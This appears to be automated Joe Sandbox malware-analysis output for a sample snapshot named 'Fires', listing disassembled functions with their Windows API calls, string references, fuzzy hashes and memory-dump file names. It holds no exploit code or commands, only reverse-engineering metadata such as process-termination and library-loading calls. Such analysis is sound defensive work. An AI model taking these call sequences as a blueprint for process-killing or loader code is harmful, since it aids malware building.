Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
String ID: .lnk
API String ID: 3172280962-24824748
Opcode ID: 535fc63d68b9b08165a1da559f6e1034ef8482c704b7bca93f582e0bb32f58b6
Instruction ID: 1dfb5801d9f3fe0f3f295b3edb98ec37ceae048003798ac45c0f58d702ca8516
Opcode Fuzzy Hash: 535fc63d68b9b08165a1da559f6e1034ef8482c704b7bca93f582e0bb32f58b6
Instruction Fuzzy Hash: C9D11171A08301DFC714DF25C484A6ABBE5FF89714F188859F8869B361CB36EC45CBA2

Function 00D636F2 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00D636E9,00D63355), ref: 00D63700
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00D6370E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D63727
SetLastError.KERNEL32(00000000,?,00D636E9,00D63355), ref: 00D63779

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 2815f125ad0f0ce41ca2b8fb2d5ddef7f7840d9971335f79cbd5d7e929b693c0
Instruction ID: 80cb19066917cb7aabc29a6d24b3111d03513ea0c82e61bf7ae5f06e88d20048
Opcode Fuzzy Hash: 2815f125ad0f0ce41ca2b8fb2d5ddef7f7840d9971335f79cbd5d7e929b693c0
Instruction Fuzzy Hash: D30147B264E3112FEA2427F5BCC65772BA5EB25771734032AF114911F0EF538E429270

Function 00D730E7 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,00D64D53,00000000,?,?,00D668E2,?,?,00000000), ref: 00D730EB
_free.LIBCMT ref: 00D7311E
_free.LIBCMT ref: 00D73146
SetLastError.KERNEL32(00000000,?,00000000), ref: 00D73153
SetLastError.KERNEL32(00000000,?,00000000), ref: 00D7315F
_abort.LIBCMT ref: 00D73165

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: eaf27d83de6e346477adb200baadcb6e4878f5787462081ecdaf485ec14969ad
Instruction ID: 05a1a8287200de7e9d680f80c4e91484f6bc629d5b6534a7433efeba15987c66
Opcode Fuzzy Hash: eaf27d83de6e346477adb200baadcb6e4878f5787462081ecdaf485ec14969ad
Instruction Fuzzy Hash: 19F0F43650570077C7222739AC07AAA236ADFC0770B64C019FD2CE22D2FE218E426171

Function 00DD9480 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00D41F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00D41F87
Part of subcall function 00D41F2D: SelectObject.GDI32(?,00000000), ref: 00D41F96
Part of subcall function 00D41F2D: BeginPath.GDI32(?), ref: 00D41FAD
Part of subcall function 00D41F2D: SelectObject.GDI32(?,00000000), ref: 00D41FD6

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00DD94AA
LineTo.GDI32(?,00000003,00000000), ref: 00DD94BE
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00DD94CC
LineTo.GDI32(?,00000000,00000003), ref: 00DD94DC
EndPath.GDI32(?), ref: 00DD94EC
StrokePath.GDI32(?), ref: 00DD94FC

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 30d43a2e3fa6876dffdfadb1e4a88e2fc7ee9d51ebe586be0e72e343cd35a6b1
Instruction ID: 6f93cb27e94bcb362c87ee8889c864410b60543ef21441b442bfc438dcd6f009
Opcode Fuzzy Hash: 30d43a2e3fa6876dffdfadb1e4a88e2fc7ee9d51ebe586be0e72e343cd35a6b1
Instruction Fuzzy Hash: 8E110C76001249BFDF029F94DC88EAA7F6DEB08360F04C012BA19952A1C7729D559BB0

Function 00D4327E Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00D432AF
MapVirtualKeyW.USER32(00000010,00000000), ref: 00D432B7
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00D432C2
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00D432CD
MapVirtualKeyW.USER32(00000011,00000000), ref: 00D432D5
MapVirtualKeyW.USER32(00000012,00000000), ref: 00D432DD

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 910ca30f6226ce2fce5cd55823825aa9ead23bdf25e5824683bc617a512dfa6c
Instruction ID: 59e274f48a18d6733497870bdd1e170639687734fb1b1a7aad9fbe4f8b27808a
Opcode Fuzzy Hash: 910ca30f6226ce2fce5cd55823825aa9ead23bdf25e5824683bc617a512dfa6c
Instruction Fuzzy Hash: A3016CB09427597DE3008F5A8C85B52FFA8FF19354F00411B915C47A41C7F5A864CBE5

Function 00DAF437 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00DAF447
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00DAF45D
GetWindowThreadProcessId.USER32(?,?), ref: 00DAF46C
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00DAF47B
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00DAF485
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00DAF48C

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: cede59cf7d181c76cd13b5b9bdf7d74dc9e30c2d4bac9c632896762c5acb6901
Instruction ID: 4e07a307b4248e445e2aa9ef32ae84ea6f13bfc10f8dc5ff1b8a6f1f1bfce5c8
Opcode Fuzzy Hash: cede59cf7d181c76cd13b5b9bdf7d74dc9e30c2d4bac9c632896762c5acb6901
Instruction Fuzzy Hash: FCF03032242258BBEB215B929C0EEEF7B7DEFC6B11F00005AF601D1290D7A05A01C6B5

Function 00D834D6 Relevance: 9.0, APIs: 6, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 00D834EF
SendMessageW.USER32(?,00001328,00000000,?), ref: 00D83506
GetWindowDC.USER32(?), ref: 00D83512
GetPixel.GDI32(00000000,?,?), ref: 00D83521
ReleaseDC.USER32(?,00000000), ref: 00D83533
GetSysColor.USER32(00000005), ref: 00D8354D

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: 863be405bb16716e0f9a01c07da89638173521956fdc3bbd640df96305ce8f33
Instruction ID: 60c3917ca39c2044f61b42ce8b7f30bb712ab77ae858007e83fe279131599284
Opcode Fuzzy Hash: 863be405bb16716e0f9a01c07da89638173521956fdc3bbd640df96305ce8f33
Instruction Fuzzy Hash: 4D014B31501205EFDF506F64DC08FE97BB6FB04721F5401A1FA1AE22A0CB315E51AB60

Function 00DA21C1 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00DA21CC
UnloadUserProfile.USERENV(?,?), ref: 00DA21D8
CloseHandle.KERNEL32(?), ref: 00DA21E1
CloseHandle.KERNEL32(?), ref: 00DA21E9
GetProcessHeap.KERNEL32(00000000,?), ref: 00DA21F2
HeapFree.KERNEL32(00000000), ref: 00DA21F9

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 3c1c3f9dc1d6bed9369d8ddaf8a454adca0b35df06f3ac391d0959d25616cb43
Instruction ID: 204135def1174663e9ec632b4f2eee222f7ddc7b5423cfdfec507e5de2523098
Opcode Fuzzy Hash: 3c1c3f9dc1d6bed9369d8ddaf8a454adca0b35df06f3ac391d0959d25616cb43
Instruction Fuzzy Hash: 2CE0E576005305FBDF012FA1EC0C90ABF3AFF59322B104222F225C2270CB329420DB60

Function 00DCB7C4 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 00DCB903

Part of subcall function 00D441EA: _wcslen.LIBCMT ref: 00D441EF

GetProcessId.KERNEL32(00000000), ref: 00DCB998
CloseHandle.KERNEL32(00000000), ref: 00DCB9C7

Strings

<, xrefs: 00DCB8CB
@, xrefs: 00DCB8D2

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell_wcslen
String ID: <$@
API String ID: 146682121-1426351568
Opcode ID: a0006976d58aeff3a5c2a252c9f83fbe2ccc29b9b7584fc537a3cd5163ab6d55
Instruction ID: a8cc60af7f764aff6b5ecdc228eb6da06fdedfe64e6210d872edef11e464a5c9
Opcode Fuzzy Hash: a0006976d58aeff3a5c2a252c9f83fbe2ccc29b9b7584fc537a3cd5163ab6d55
Instruction Fuzzy Hash: 39712675A002169FCB14EF94C495A9EBBF5FF08320F04849AE856AB352CB75ED45CFA0

Function 00DD4818 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00DD48D1
IsMenu.USER32(?), ref: 00DD48E6
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00DD492E
DrawMenuBar.USER32 ref: 00DD4941

Strings

0, xrefs: 00DD4825

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert
String ID: 0
API String ID: 3076010158-4108050209
Opcode ID: a56d3b700cb243204d7cb30950a214c2960aafc5b8869ead0000d61d7f03da4a
Instruction ID: 0d76dcff133feb20195b9eb5a79819f39fe394d8f9304bf8ec522e2d33a87e57
Opcode Fuzzy Hash: a56d3b700cb243204d7cb30950a214c2960aafc5b8869ead0000d61d7f03da4a
Instruction Fuzzy Hash: B9413AB5A01249AFDF10CF56D894AAA7BB9FF06364F08412EE945A7350C730ED54CF60

Function 00DA272F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D4B329: _wcslen.LIBCMT ref: 00D4B333

Part of subcall function 00DA45FD: GetClassNameW.USER32(?,?,000000FF), ref: 00DA4620

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00DA27B3
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00DA27C6
SendMessageW.USER32(?,00000189,?,00000000), ref: 00DA27F6

Part of subcall function 00D48577: _wcslen.LIBCMT ref: 00D4858A

Strings

ListBox, xrefs: 00DA2772
ComboBox, xrefs: 00DA273D

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: MessageSend$_wcslen$ClassName
String ID: ComboBox$ListBox
API String ID: 2081771294-1403004172
Opcode ID: 6c94f38bba309b0621d70eedaea3545be7aa7c3df8fdf354f9d082ced29521f9
Instruction ID: 385216c396bbeb480d5fe16051da1be59a993405a3b528591bcb46a9ec13fad7
Opcode Fuzzy Hash: 6c94f38bba309b0621d70eedaea3545be7aa7c3df8fdf354f9d082ced29521f9
Instruction Fuzzy Hash: 1921D671940104BFDB05ABB5D846DFE7B79DF56360F14412AF422A71E1CB7889099A70

Function 00DD39B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00DD3A29
LoadLibraryW.KERNEL32(?), ref: 00DD3A30
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00DD3A45
DestroyWindow.USER32(?), ref: 00DD3A4D

Strings

SysAnimate32, xrefs: 00DD3A04

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: MessageSend$DestroyLibraryLoadWindow
String ID: SysAnimate32
API String ID: 3529120543-1011021900
Opcode ID: 0c0f1c10db135cc5a1d18bb6012cff7b0f491bb3950ff0126f4275e42cdbc21c
Instruction ID: 8c9920f75b3bd6dfe1468bb37d4369f4788a69569bbf6d0f1728bc233d008dfe
Opcode Fuzzy Hash: 0c0f1c10db135cc5a1d18bb6012cff7b0f491bb3950ff0126f4275e42cdbc21c
Instruction Fuzzy Hash: 72219D71600209ABEF108F64DC90FAB77A9EB45364F14661AFA9192290C771CD509B72

Function 00DD9A25 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D4249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00D424B0

GetCursorPos.USER32(?), ref: 00DD9A5D
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00DD9A72
GetCursorPos.USER32(?), ref: 00DD9ABA
DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 00DD9AF0

Strings

(, xrefs: 00DD9A30

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID: (
API String ID: 2864067406-2063206799
Opcode ID: d0fc6c9416065c6f9ff451360f6b2b500b08e008c6ff009b15958c19564cabd7
Instruction ID: 46c9b5f106142b2c14c864136642ba945e32c759d526e930e32aedded9baf286
Opcode Fuzzy Hash: d0fc6c9416065c6f9ff451360f6b2b500b08e008c6ff009b15958c19564cabd7
Instruction Fuzzy Hash: 5D21D132600118EFCF259F98CC68EFABBBAEB49310F44415AFA059B261D3329950DB70

Function 00D41AAC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00D4249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00D424B0

DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00D41AF4
GetClientRect.USER32(?,?), ref: 00D831F9
GetCursorPos.USER32(?), ref: 00D83203
ScreenToClient.USER32(?,?), ref: 00D8320E

Strings

(, xrefs: 00D41AB2

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID: (
API String ID: 4127811313-2063206799
Opcode ID: 2c1c5b46e3d9fe26c9f08949aed4305f3677943fe3835b354dc327b5246926ea
Instruction ID: f8a06510ba052aa93f9a2fdde5d229c671cea354da29431a4c2e777f17d73d70
Opcode Fuzzy Hash: 2c1c5b46e3d9fe26c9f08949aed4305f3677943fe3835b354dc327b5246926ea
Instruction Fuzzy Hash: A6113A35A01219ABCF00EFA8C9869EE77B9FB05741F100456E906E3240D771BA92CBB1

Function 00D650DD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00D6508E,?,?,00D6502E,?,00E098D8,0000000C,00D65185,?,00000002), ref: 00D650FD
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00D65110
FreeLibrary.KERNEL32(00000000,?,?,?,00D6508E,?,?,00D6502E,?,00E098D8,0000000C,00D65185,?,00000002,00000000), ref: 00D65133

Strings

mscoree.dll, xrefs: 00D650F6
CorExitProcess, xrefs: 00D65108

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 68d642e01ed11ed832556e8b54d62934e14fa5fdf8dbb044126031f8f3f62a5c
Instruction ID: 15427d2a12c146ce220b6dc79c5693925164ab35c37403ec7b273b072887fa40
Opcode Fuzzy Hash: 68d642e01ed11ed832556e8b54d62934e14fa5fdf8dbb044126031f8f3f62a5c
Instruction Fuzzy Hash: 9EF04434A41708BFDB11AF95DC49B9DBFB5EF08752F040065F805E2260DB755984DAB0

Function 00D9E778 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00D9E785
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00D9E797
FreeLibrary.KERNEL32(00000000), ref: 00D9E7BD

Strings

X64, xrefs: 00D9E680
GetSystemWow64DirectoryW, xrefs: 00D9E791

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: GetSystemWow64DirectoryW$X64
API String ID: 145871493-2590602151
Opcode ID: f450ae458bb69f6946b68a230a474dc998bb1e4d18a55476fea6690d3b133d12
Instruction ID: 13767d937e2e86b102d564d7219fa9036bb54d839ee5ff7fc3128da8b7881bde
Opcode Fuzzy Hash: f450ae458bb69f6946b68a230a474dc998bb1e4d18a55476fea6690d3b133d12
Instruction Fuzzy Hash: 1CF09BB18027129FDF759F209C48E697725AF21B01B1505A9FD81F6150DF30CD88C775

Function 00D4663E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00D4668B,?,?,00D462FA,?,00000001,?,?,00000000), ref: 00D4664A
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00D4665C
FreeLibrary.KERNEL32(00000000,?,?,00D4668B,?,?,00D462FA,?,00000001,?,?,00000000), ref: 00D4666E

Strings

kernel32.dll, xrefs: 00D46642
Wow64DisableWow64FsRedirection, xrefs: 00D46656

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: f77f050576dab739e2abff0b19ac466f932a9baa31b410c1b775f604ed160301
